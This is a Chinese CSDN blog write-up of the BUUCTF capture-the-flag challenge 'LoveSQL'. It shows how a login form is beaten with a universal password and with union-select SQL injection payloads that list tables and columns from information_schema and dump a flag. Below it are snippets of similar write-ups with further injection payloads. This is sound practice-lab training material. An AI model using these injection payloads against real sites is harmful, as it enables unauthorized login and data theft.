BUUCTF WEB [极客大挑战 2019]LoveSQL1

最新推荐文章于 2022-10-04 16:58:01 发布
最新推荐文章于 2022-10-04 16:58:01 发布
阅读量170 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guishengyx/article/details/120833207
版权

SQL注入 数据库 信息泄露 安全防护 Web漏洞
关键词由CSDN通过智能技术生成

首先查看源码,没什么发现

继续尝试万能密码

 

 成功登录

MD5解密无果

看起来不是

 因为题目提示SQL,所以试一下注入

使用他给的密码登录admin

在url中使用order by,查询到有3个字段

 直接使用union select 1,2,3

发现回显没有改变,将password的值改为1,显错注入

 ?username=admin&password=1'union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1-- asd

 

 修改limit的值,可以得到

geekuser

l0ve1ysq1

?username=admin&password=1'union select 1,column_name,3 from information_schema.columns where table_name='l0ve1ysq1' and table_schema=database() limit 0,1

得到

id、username、password

最后在union select 1,2,password from l0ve1ysq1 limit 15,1找到了flag

 

AlienStar
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[极客挑战 2019]LoveSQL 1(详细版)
qq_61861243的博客
09-26 711
1、首先打开网站页面,一看是一个登录界面,我们想到运用SQL注入,利用密码1’ or 1=1登陆一下,得到admin用户以及他的密码。2、根据之前获得的信息对我找flag没有啥有用的信息,我想到利用SQL语句查询一下刚刚得到的admin所在表的列信息,这里我使用1%27order by 4 %23 与 1%27order by 3 %23 对比判断出表的列数为3。(用%27替代’ , %23替代#)
[极客挑战 2019]LoveSQL 1
最新发布
m0_73734159的博客
11-02 506
步骤和数据表geekuser一样,这里直接爆数据表l0ve1ysq1的flag值。这里猜测注入语句某字段被过滤,或者是’;'被过滤导致不能堆叠注入。字段:id、username、password。爆geekuser数据表的所有内容。同时验证了猜想不能使用堆叠注入。爆geekuser数据表的字段。转手数据表l0ve1ysq1。按照先后顺序把,先爆第一个。成功,但是不存在第4列。采用密码参数进行注入。
[极客挑战 2019]LoveSQL1
weixin_41571993的博客
10-04 323
靶场练习
BUUCTF-WEB:[极客挑战 2019]LoveSQL 1
_Co1a
01-26 525
工具:Firefox,hackbar 这是一道非常常规的SQL的union联合注入的例题 步骤: union联合注入过程 第一步、测试注入点(一些小tips:利用引号,and 1=1, or 1=1之类的)判断是字符型还是数字型 payload:?username=1'%23&password=123 =====》NO,Wrong username password!!!此时是在url中输入的,所以不能用#,而用其url编码%23 ?us...
BUUCTF】[极客挑战 2019]LoveSQL1writeup
GZWZ_的博客
05-04 962
easysql
极客web前端
07-22
教程名称:极客web前端教程目录:【】1、走进前端工程师的世界【】2、HTML5【】3、CSS3【】4、Javascript【】5、常?的库之 jQuery【】6、常?的库之 jQuery UI【】7、常?的库之 jQuery Mobile【】8、常用的库之...
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
极客学院web前端开发学习教程
05-25
包含bootstrap、html5、php、web前端开发,百度网盘地址
Web3极客日报 #12
01-08
基于Web3,Solidity,Truffle的一个完整的售卖和购买的简单Dapp demo。 如何在以太坊上构建TodoList – 教程@Riverhttps://www.dappuniversity.com/articles/blockchain-app-tutorial 基于Web3,Solidity,Truffle等...
极客挑战2019——easy sql
qq_44308327的博客
11-25 3411
既然是sql注入,那就按照注入流程来 1、先找注入类型 payload:?username=admin&password=1 payload:?username=admin&password=2-1 //判断页面是否相同 两次注入结构页面相同,由此判断为整形注入 2、找回显位 payload:?username=admin&password=1' order by 3%23 payload:?username=admin&password=1' or.
BUUCTF [极客挑战 2020] Roamphp1-Welcome
Senimo
12-21 1272
BUUCTF [极客挑战 2020] Roamphp1-Welcome 考点: POST传参方式 sha1()不能加密数组 启动题目: 等了一阵子,一直是这样,查阅其他wp得知,原题中提示有:换一种请求方式 使用BurpSuite抓去数据包: 将传参方式修改为POST,发送数据包,得到题目源码: error_reporting(0); if ($_SERVER['REQUEST_METHOD'] !== 'POST') { header("HTTP/1.1 405 Method Not Allow
BUUCTF之[极客挑战 2019]EasySQL 1
weixin_44632787的博客
06-13 532
BUUCTF之[极客挑战 2019]EasySQL 1 开启靶机,看到我们的挑战界面 这个页面看起来就很像是SQL注入,而且我们的题目也有提示到。。。 OK,我们先输入一个万能密码看看~~~账号:1’ or 1=1 # 密码可以随便输入 好吧,这题过于简单。。。。。。 得到的Flag是:flag{f3bcaef4-f19b-4e56-bf4d-9780988e0b89} ...
极客挑战 2019 Http 1
fly夏天的博客
03-19 3494
复现平台:buuctf ,该题很有意思因此记录一下。 打开页面,乍一看以为是一个广告页,目录扫描也没有出现东西。 使用brupsuite抓包 发现有个Secret.php的链接,点击访问。X-Forwarded-For: localhost Syclover 提示访问来源不对,此时我们可以通过Referer头来伪造链接来源。 注:HTTP Referer是header的一部分,...
web buuctf [极客挑战 2019]Secret File1
weixin_44214568的博客
08-05 291
1.点击靶机,查看到主页的源代码,源代码含有Archive_room.php;打开该文件,发现源代码中含有action.php,继续点开,界面提示
wasm逆向——(极客挑战2021wasm
weixin_52369224的博客
11-28 6443
WebAssembly是一种全新的Web编程语言,但是与JavaScript不同,它不是一种让你直接手动编写的语言,而是C / C ++,Rust,C#和TypeScript等不断增加的上层语言的编译目标。 wasm是基于堆栈的虚拟机的二进制指令格式 wabt包安装 尝试了gitclone的方法,一直没安装成功,尝试: sudo apt install wabt 我的环境:ubuntu20.4 WABT(我们将其称为“ wabbit”)是用于WebAssembly的一套工具,包括: wa.
[极客挑战 2019]BabySQL 1(双写绕过)
weixin_45253573的博客
12-08 1538
存在sql注入漏洞 username:1’ order by 2# password:1 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘der 2#’ and password='1’’ at line 1 or被过滤 username:1’ union select ..
Tamevic’s Ctf-Web writeup@BUUCTF Web合集(更新中...)
Tamevic的博客
06-20 866
Tamevic’s Ctf-Web writeup@BUUCTF Web 前言 大学所有课程都结束了,接下来还有考试和其他一些安排就要毕业了。从大二开始一直在说什么时候能有大块空闲时间好好学学ctf,但是课程安排比较紧张,一直没得空。现在好不容易有了大块时间,说开始就开始。 这次选择BUUCTFWeb题,这里题目基本都是历年各大赛事的原题,质量比较高,便于积累。 HCTF2018 WarmUp 环境一起就是一个滑稽…查看源码,提示去看source.php source.php里是源码 经过百度得知这
BUUCTF:[极客挑战 2019]EasySQL
Starbright.的博客
10-29 1393
账户: admin 'or '1'='1'# 万能密码: 'or '1'='1'# ' or 1='1
buuctf web 极客挑战2019
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值